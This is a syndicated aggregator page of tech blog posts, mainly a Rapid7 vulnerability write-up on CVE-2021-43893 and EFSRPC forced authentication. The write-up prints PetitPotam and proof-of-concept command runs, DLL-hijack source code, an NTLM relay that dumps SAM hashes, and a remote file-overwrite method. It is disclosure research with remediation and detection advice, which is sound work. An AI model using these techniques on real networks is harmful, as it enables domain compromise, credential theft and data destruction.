Rajat is a Sr. Solutions Architect at Amazon Web Services. Rajat is a passionate technologist who enjoys building innovative solutions for AWS customers. His core areas of focus are IoT, Networking and Serverless computing. In his spare time, Rajat enjoys long drives, traveling and spending time with family.

[$] Going big with TCP packets

Post Syndicated from original https://lwn.net/Articles/884104/

Like most components in the computing landscape, networking hardware has
grown steadily faster over time. Indeed, today’s high-end network
interfaces can often move data more quickly than the systems they are
attached to can handle. The networking developers have been working for
years to increase the scalability of their subsystem; one of the current
projects is the
BIG TCP patch set
from Eric Dumazet and Coco Li. BIG TCP isn’t for
everybody, but it has the potential to significantly improve networking
performance in some settings.

Upcoming Speaking Engagements

Post Syndicated from Schneier.com Webmaster original https://www.schneier.com/blog/archives/2022/02/upcoming-speaking-engagements-17.html

This is a current list of where and when I am scheduled to speak:

  • I’m speaking at IT-S Now 2022 in Vienna on June 2, 2022.
  • I’m speaking at the 14th International Conference on Cyber Conflict, CyCon 2022, in Tallinn, Estonia on June 3, 2022.
  • I’m speaking at the RSA Conference 2022 in San Francisco, June 6-9, 2022.

The list is maintained on this page.

Running IBM MQ on AWS using High-performance Amazon FSx for NetApp ONTAP

Post Syndicated from Senthil Nagaraj original https://aws.amazon.com/blogs/architecture/running-ibm-mq-on-aws-using-high-performance-amazon-fsx-for-netapp-ontap/

Many Amazon Web Services (AWS) customers use IBM MQ on-premises and are looking to migrate it to the AWS Cloud. For persistent storage requirements with IBM MQ on AWS, Amazon Elastic File System (Amazon EFS) can be used for distributed storage and to provide high availability. The AWS Quick Start that deploys IBM MQ with Amazon EFS suits applications whose file system throughput requirements fall within the Amazon EFS limits.

However, some customers need more capacity for their IBM MQ workloads. Applications that rely heavily on IBM MQ generate much higher message data throughput, which means the persistent messages must be written to and read from the shared file system more frequently. IBM MQ also writes its log information to the shared file system. Both situations translate into a higher number of read/write operations.

For applications using IBM MQ that require higher file system throughput, AWS offers Amazon FSx for NetApp ONTAP: fully managed shared storage in the AWS Cloud with the popular data access and management capabilities of ONTAP.

This blog explains how to use Amazon FSx for NetApp ONTAP for distributed storage and high availability with IBM MQ. Read more about Amazon FSx for NetApp ONTAP features, performance details, throughput options, and performance tips.

Overview of IBM MQ architecture on AWS

For recovering queue data upon failure, you can set up IBM MQ with high availability.

The solution architecture is shown in Figure 1. This blog post assumes familiarity with AWS services such as Amazon EC2, VPCs, and subnets. For additional information on these topics, see the AWS documentation.

Figure 1. IBM MQ with Amazon FSx NetApp ONTAP


  1. IBM MQ is deployed in an Auto Scaling group spanning two Availability Zones.
  2. Amazon FSx NetApp ONTAP is used for data persistence and high availability of queue message data.
  3. Amazon FSx NetApp ONTAP is set up in the same Availability Zones as IBM MQ.
  4. Amazon FSx NetApp ONTAP provides automatic failover that is transparent to the application and completes in 60 seconds.

Considerations for the Amazon FSx NetApp ONTAP file system

When creating the Amazon FSx NetApp ONTAP file system as in Figure 1, consider the following:

  1. The subnets used for the file system should have connectivity with the subnets where your IBM MQ is running. See VPC documentation.
  2. Ensure that the security group(s) used by the elastic network interfaces (ENI) for Amazon FSx allow communication with the IBM MQ environment. Read more about limiting access security groups.
  3. When choosing the storage capacity, IOPS, and throughput capacity, make sure it aligns to your application requirements.
  4. If you choose to use AWS Key Management Service (AWS KMS) encryption, configure those details correctly.
  5. Be sure to provide an appropriate name for the volume junction, as you will use it to mount the file system onto your IBM MQ instance(s).
  6. Choose appropriate backup and maintenance windows according to your application needs.

Mount the Amazon FSx NetApp ONTAP file system onto the instance(s) where IBM MQ is running. Use either the DNS name or the IP address for the file system, as well as the correct volume junction name while mounting. Configure IBM MQ to make use of this mount for persisting the queue data.

Add this mount point to /etc/fstab on Linux machines so that the file system is mounted automatically if the instance restarts. For Windows, take the appropriate steps to mount the file system automatically upon restart.
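As a sketch, the Linux side might look like the following. The file system DNS name, the volume junction name /mq_data, and the mount point /mnt/mqm are placeholders for illustration, not values from this post; substitute your own from the Amazon FSx console:

```shell
# One-off NFS mount of the FSx for ONTAP volume junction
sudo mkdir -p /mnt/mqm
sudo mount -t nfs svm-mq.fs-0123456789abcdef0.fsx.us-east-1.amazonaws.com:/mq_data /mnt/mqm

# /etc/fstab entry (add this line) so the volume is remounted after a restart;
# _netdev defers mounting until networking is up:
#   svm-mq.fs-0123456789abcdef0.fsx.us-east-1.amazonaws.com:/mq_data  /mnt/mqm  nfs  nfsvers=4.1,_netdev  0  0
```

After mounting, point the IBM MQ queue manager's data and log directories at this mount so persistent messages survive an instance failure.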

Conclusion

In this post, you have learned how to use Amazon FSx NetApp ONTAP with IBM MQ to maximize queue data throughput, while continuing to have persistent message storage. You can provision the Amazon FSx NetApp ONTAP file system, and mount its volume junction onto the IBM MQ instance(s).

Build a reliable, scalable, and cost-efficient IBM MQ solution on AWS, by using the fully elastic features that Amazon FSx NetApp ONTAP provides.


Include diagrams in your Markdown files with Mermaid

Post Syndicated from Martin Woodward original https://github.blog/2022-02-14-include-diagrams-markdown-files-mermaid/

A picture tells a thousand words, but up until now the only way to include pictures and diagrams in your Markdown files on GitHub has been to embed an image. We added support for embedding SVGs recently, but sometimes you want to keep your diagrams up to date with your docs and create something as easily as doing ASCII art, but a lot prettier.

Enter Mermaid 🧜‍♀️🧜‍♂️

Mermaid is a JavaScript based diagramming and charting tool that takes Markdown-inspired text definitions and creates diagrams dynamically in the browser. Maintained by Knut Sveidqvist, it supports a bunch of different common diagram types for software projects, including flowcharts, UML, Git graphs, user journey diagrams, and even the dreaded Gantt chart.

Working with Knut and also the wider community at CommonMark, we’ve rolled out a change that will allow you to create graphs inline using Mermaid syntax, for example:

```mermaid
  graph TD;
      A-->B;
      A-->C;
      B-->D;
      C-->D;
```

The raw code block above will appear as this diagram in the rendered Markdown:

rendered diagram example

How it works

When we encounter code blocks marked as mermaid, we generate an iframe that takes the raw Mermaid syntax and passes it to Mermaid.js, turning that code into a diagram in your local browser.

We achieve this through a two-stage process—GitHub’s HTML pipeline and Viewscreen, our internal file rendering service.

First, we add a filter to the HTML pipeline that looks for raw pre tags with the mermaid language designation and substitutes them with a template that works progressively, such that clients requesting content with embedded Mermaid in a non-JavaScript environment (such as an API request) will see the original Markdown code.

Next, assuming the content is viewed in a JavaScript-enabled environment, we inject an iframe into the page, pointing the src attribute to the Viewscreen service. This has several advantages:

  • It offloads the library to an external service, keeping the JavaScript payload we need to serve from Rails smaller.
  • Rendering the charts asynchronously helps eliminate the overhead of potentially rendering several charts before sending the compiled ERB view to the client.
  • User-supplied content is locked away in an iframe, where it has less potential to cause mischief on the GitHub page that the chart is loaded into.

The net result is fast, easily editable, and vector-based diagrams right in your documentation where you need them.

Mermaid has been getting increasingly popular with developers and has a rich community of contributors led by the maintainer Knut Sveidqvist. We are very grateful for Knut’s support in bringing this feature to everyone on GitHub. If you’d like to learn more about the Mermaid syntax, head over to the Mermaid website or check out Knut’s first official Mermaid book.

Dropping Files on a Domain Controller Using CVE-2021-43893

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/


On December 14, 2021, during the Log4Shell chaos, Microsoft published CVE-2021-43893, a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to James Forshaw of Google Project Zero, but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.

On January 13, 2022, Forshaw tweeted about the vulnerability.


The tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero bug tracker, where an extended writeup and some proof-of-concept code was stored.

This vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged remote user, turning my LPE into RCE.

I set out to investigate if the remote file-writing aspect of James Forshaw’s bug was truly unpatched. The investigation resulted in a few interesting observations:

  • Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on systems assigned unconstrained delegation.
  • Forced authentication and relaying are still not completely patched. Relay attacks initiated on the efsrpc named pipe have been known since inclusion in PetitPotam in July 2021. The issue seems to persist despite multiple patch attempts.

Although the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn’t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the EFSRPC protocol to be worthy of more examination.

Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam

PetitPotam was released in the summer of 2021 and was widely associated with an attack chain that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is only the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. MITRE ATT&CK T1187 – Forced Authentication). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.

PetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the lsarpc named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an EfsRpcOpenFileRaw request containing a UNC file path. Using a UNC path such as \\10.0.0.4\fake_share\fake_file forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That’s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that’s all we need to know.

Microsoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of EfsRpcOpenFileRaw over the lsarpc named pipe. To do this, they added logic to efslsaext.dll's EfsRpcOpenFileRaw_Downlevel function to check for a value stored at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS\AllowOpenRawDL. Because this registry value doesn't exist by default, a typical configuration will always fail this check.
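In effect, the August gate reduces to: allow EfsRpcOpenFileRaw over lsarpc only when that registry value exists and is nonzero. A minimal sketch of the logic, with a plain dict standing in for the registry (the helper name is illustrative, not from the patch):

```python
EFS_KEY = r"SYSTEM\CurrentControlSet\Services\EFS"

def allow_open_raw_downlevel(registry: dict) -> bool:
    # AllowOpenRawDL does not exist by default, so a stock configuration
    # always fails this check and the call is rejected.
    return bool(registry.get(EFS_KEY + r"\AllowOpenRawDL", 0))

print(allow_open_raw_downlevel({}))                                 # default install -> False
print(allow_open_raw_downlevel({EFS_KEY + r"\AllowOpenRawDL": 1}))  # opted back in  -> True
```

An allow-list gate on a single function, rather than a fix to the UNC path handling itself, is precisely why switching to a different EFSRPC function or named pipe bypassed it.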


That patch was inadequate, because EfsRpcOpenFileRaw isn’t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly updated to use EfsRpcEncryptFileSrv, and just like that, the patch was bypassed.

The patch also failed to recognize that lsarpc wasn't the only named pipe that EFSRPC can be executed over. The efsrpc named pipe (among others) can also be used. The efsrpc pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, and it doesn't use the EfsRpcOpenFileRaw_Downlevel function. That means an attacker can also bypass the patch by switching named pipes.

As mentioned earlier, PetitPotam was updated in July 2021 to use the efsrpc named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker-controlled box running Responder.py (10.0.0.6). (I've left out the Responder output, since this is just meant to highlight that EFSRPC remained available and unpatched for months.)

albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p 'cheesed00dle!' -d okhuman.ninja  10.0.0.6 10.0.0.5 

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



[-] Connecting to ncacn_np:10.0.0.5[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Not only did Microsoft fail to patch the issue, but they didn't issue follow-up patches for months. They also haven't updated their advisory to indicate that the vulnerability has been exploited in the wild, despite its inclusion in CISA's Known Exploited Vulnerabilities Catalog.


In December 2021, Microsoft released a patch for a different EFSRPC vulnerability: CVE-2021-43217. As part of the remediation for that issue, Microsoft implemented some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use RPC_C_AUTHN_LEVEL_PKT_PRIVACY when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.


At the time of the December patch, PetitPotam didn’t use this specific setting. However, a quick update allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.

CVE-2021-43893: Windows EFS remote file upload

James Forshaw’s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam’s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: \\.\C:\. Using a UNC path that points to the victim’s local file system allows attackers to create files and directories on the victim file system.
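The distinction between the two attacks is just the shape of the UNC path. A rough illustration of how the two path forms behave (deliberately simplified; Windows path parsing has many more cases than this):

```python
def unc_target(path: str) -> str:
    r"""Classify where a UNC path sends the EFSRPC server."""
    if path.startswith("\\\\.\\"):
        return "local device"   # \\.\C:\... stays on the victim's own file system
    if path.startswith("\\\\"):
        return "remote host"    # \\10.0.0.4\share\... forces outbound authentication
    return "plain path"

print(unc_target("\\\\10.0.0.4\\fake_share\\fake_file"))  # PetitPotam-style   -> remote host
print(unc_target("\\\\.\\C:\\Python27\\fveapi.dll"))      # CVE-2021-43893-style -> local device
```

Same API, same parameter; only the prefix decides whether the server leaks credentials outward or writes files on itself.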

There are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That’s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.

Second, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. C:\ProgramData\). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn’t guaranteed, there are many plausible scenarios that could lead there.

A plausible scenario leading to RCE using CVE-2021-43893

My interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can’t yet share the LPE as it’s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.

Microsoft has long maintained that Microsoft services vulnerable to DLL planting via a world writable %PATH% directory are won’t-fix low-security issues — a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable %PATH to escalate privileges via a Windows service (MITRE ATT&CK – Hijack Execution Flow: DLL Search Order Hijacking) is a useful technique when it’s available.

There’s a well-known product that installs itself into a world-writable directory: Python 2.7, all the way through its final release, 2.7.18.

C:\Users\administrator>icacls.exe C:\Python27\
C:\Python27\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

The Python 2.7 installer drops files into C:\Python27\ and provides the user with the following instructions:

Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows’ default):

C:\WINDOWS\system32;C:\WINDOWS;C:\Python25

Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.

Following these instructions, we now have a world-writable directory in %PATH% — which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in C:\Python27\. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 system and watching procmon. I found that a number of services will search C:\Python27\ for:

  • fveapi.dll
  • cdpsgshims.dll

To exploit this, we just need to drop a “malicious” DLL named fveapi.dll or cdpsgshims.dll in C:\Python27. The DLL will be loaded when a vulnerable service restarts or the server reboots.

For this simple example, the “malicious” dll just creates the file C:\r7.txt:

#include <Windows.h>

HANDLE hThread;
DWORD dwThread;

DWORD WINAPI doCreateFile(LPVOID)
{
    HANDLE createFile = CreateFileW(L"C:\\r7.txt", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    CloseHandle(createFile);
    return 0;
}

BOOL APIENTRY DllMain( HMODULE, DWORD  ul_reason_for_call, LPVOID)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

After compiling the DLL, an attacker can remotely drop the file into C:\Python27 using CVE-2021-43893. The following is the output from our refactored and updated version of Forshaw’s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):

C:\ProgramData>whoami
okhuman\lowlevel

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Python27\fveapi.dll -i ./dll_inject64.dll
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Python27\fveapi.dll
[+] Encrypt the empty remote file...
[+] Reading the encrypted remote file object
[+] Read back 1244 bytes
[+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream
[+] Decrypt the the remote file
[!] Success!

C:\ProgramData>

The attack yields the desired output, and the file is written to C:\Python27\ on the remote target.


Procmon output confirms successful code execution as NT AUTHORITY\SYSTEM when the “DFS Replication” service is restarted: the malicious DLL is loaded and the file “C:\r7.txt” is created.


Do many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn’t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.

What can a higher-privileged user do?

Oddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw’s ::$DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn’t investigate why.

However, it is interesting to note that the administrative user can remotely overwrite all files. This doesn’t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort wiper or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.

C:\ProgramData>whoami
okhuman\test_admin

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Windows\System32\calc.exe -s "aaaaaaaaaaaa"
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Windows\System32\calc.exe
[+] Encrypt the empty remote file...
[-] EfsRpcEncryptFileSrv failed with status code: 5

C:\ProgramData>

As you can see from the output, the tool failed with status code 5 (Access Denied). However, calc.exe on the remote device was successfully overwritten.


Technically speaking, this doesn’t really represent a security boundary being crossed. Administrators typically have access to \\host\C$ or \\host\admin$, but the difference in behavior seemed worth mentioning. I’d also note that as of February 2022, administrative users can still do this using \\localhost\C$\Windows\System32\calc.exe.

Forshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user’s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn’t investigate that any further, but it could be useful in the correct environment.

Forced authentication still not entirely patched

The December 2021 patch brought multiple changes to efslsaext.dll and resulted in partial mitigation of CVE-2021-43893. One of the changes was the introduction of two new functions: EfsEnsureLocalPath and EfsEnsureLocalHandle. EfsEnsureLocalPath grabs a HANDLE for the attacker-provided file using CreateFileW. The HANDLE is then passed to EfsEnsureLocalHandle, which passes the HANDLE to NtQueryVolumeInformationFile to validate that the device characteristics flags don’t contain FILE_REMOTE_DEVICE.


Because the patch still opens a HANDLE using the attacker-controlled file path, EFSRPC remains vulnerable to forced authentication and relay attacks of the machine account.
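The underlying flaw is a classic order-of-operations problem: opening the attacker-controlled path is itself the dangerous side effect, and the FILE_REMOTE_DEVICE check only runs afterward. A minimal Python sketch of the pattern (the function names and "log" are illustrative stand-ins, not the actual efslsaext.dll code):

```python
def open_handle(path, outbound_auth_log):
    """Opening a UNC path makes the server authenticate to the remote host."""
    if path.startswith("\\\\"):
        # The machine account's NTLM authentication leaks here,
        # before any validation has run.
        outbound_auth_log.append(path.split("\\")[2])
    return {"path": path, "remote": path.startswith("\\\\")}

def efs_ensure_local_path(path, outbound_auth_log):
    handle = open_handle(path, outbound_auth_log)  # side effect already happened
    return not handle["remote"]                    # validation comes too late

log = []
allowed = efs_ensure_local_path(r"\\10.0.0.3\r7\r7", log)
# The remote write is rejected (allowed is False), but the server has
# already authenticated to 10.0.0.3 -- which is all a relay attack needs.
```

Rejecting the path after the open stops the file write, but not the forced authentication.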

Demonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:

The Relay (10.0.0.3): A Linux system running ntlmrelayx.py.
The Attacker (10.0.0.6): A fully patched Windows 10 system.
The Victim (10.0.0.12): A fully patched Windows Server 2019 system.

The only caveat for this example is that the victim’s machine account (aka computer account) is assigned to the Domain Admins group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of Domain Admins.

[Screenshot: the YEET$ machine account listed in the Domain Admins group]

This may not be a common configuration, but it’s common enough that it’s been the subject of a couple of excellent writeups.

The attack is launched by a low-privileged user on 10.0.0.6 using the blankspace.exe proof of concept. The attack will force 10.0.0.12 (yeet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3.

C:\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\10.0.0.3\r7\r7 --relay
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to yeet.okhuman.ninja
[+] Sending EfsRpcDecryptFileSrv for \\10.0.0.3\r7\r7
[-] EfsRpcDecryptFileSrv failed with status code: 53
[+] Network path not found error received!
[!] Success!

C:\ProgramData>

The Linux relay is running ntlmrelayx.py and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see ntlmrelayx.py capture the authentication and send it on to 10.0.0.6.

albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support 
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6
[*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED

The relay is now authenticated to 10.0.0.6 as YEET$, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.

[*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::
[+] NewStyle hashes is: True
albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::
[*] Done dumping SAM hashes for host: 10.0.0.6

It’s as easy as that. All you have to do is find a host with a machine account in the domain admins group:

C:\ProgramData>net group "domain admins" /domain
The request will be processed at a domain controller for domain okhuman.ninja.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            test_domain_admin        YEET$
The command completed successfully.


C:\ProgramData>

Once you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn’t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.
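As a rough illustration of that detection idea (field names follow the 4624 event schema; the sample events are fabricated for the sketch), machine-account network logons can be filtered out of exported security events:

```python
# Flag 4624 logon events where a machine account (name ending in "$")
# authenticated over the network (logon type 3) -- the pattern the relay produces.
def machine_account_network_logons(events):
    return [
        e for e in events
        if e["EventID"] == 4624
        and e["LogonType"] == 3
        and e["TargetUserName"].endswith("$")
    ]

events = [
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "albinolobster"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "YEET$"},
]
hits = machine_account_network_logons(events)
```

Machine accounts do log on over the network legitimately, so in practice this is a hunting filter to baseline and alert on anomalies, not a standalone indicator.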

[Screenshot: event ID 4624 recording the YEET$ machine account logon]

Final thoughts and remediation

What began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn’t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.

To mitigate these issues, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM relay-based attacks (see Microsoft Security Advisory 974926 and KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.

Some other general advice:

  • Monitoring for event ID 4420 in Windows application event logs can help detect EFSRPC-based hacking tools.
  • Monitor for event ID 4624 in Windows security event logs for remote machine account authentication.
  • Audit machine accounts to ensure they are not members of Domain Admins.
  • If possible, audit %PATH% of critical systems to ensure no world-writable path exists.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with authenticated vulnerability checks available in the December 15, 2021 content release.

Metasploit Framework users can test their exposure to forced authentication attacks with a new PetitPotam module available in the 6.1.29 release.



Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/884757/

Security updates have been issued by Debian (debian-edu-config, expat, minetest, pgbouncer, python2.7, samba, thunderbird, and varnish), Fedora (dotnet-build-reference-packages, dotnet3.1, dotnet6.0, hostapd, libdxfrw, librecad, mingw-expat, mingw-gdk-pixbuf, php-twig2, php-twig3, rust-afterburn, webkit2gtk3, and xstream), Mageia (bluez, firefox, libarchive, php-adodb, thunderbird, and webkit2), openSUSE (ghostscript, openexr, permissions, SDL2, and wireshark), Red Hat (firefox), Slackware (mariadb), and SUSE (busybox, ghostscript, openexr, permissions, SDL2, and wireshark).

Building custom connectors using the Amazon AppFlow Custom Connector SDK

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/building-custom-connectors-using-the-amazon-appflow-custom-connector-sdk/

This post is written by Kamen Sharlandjiev, Sr. Specialist SA, Integration, Ray Jang, Principal PMT, Amazon AppFlow, and Dhiraj Mahapatro, Sr. Specialist SA, Serverless.

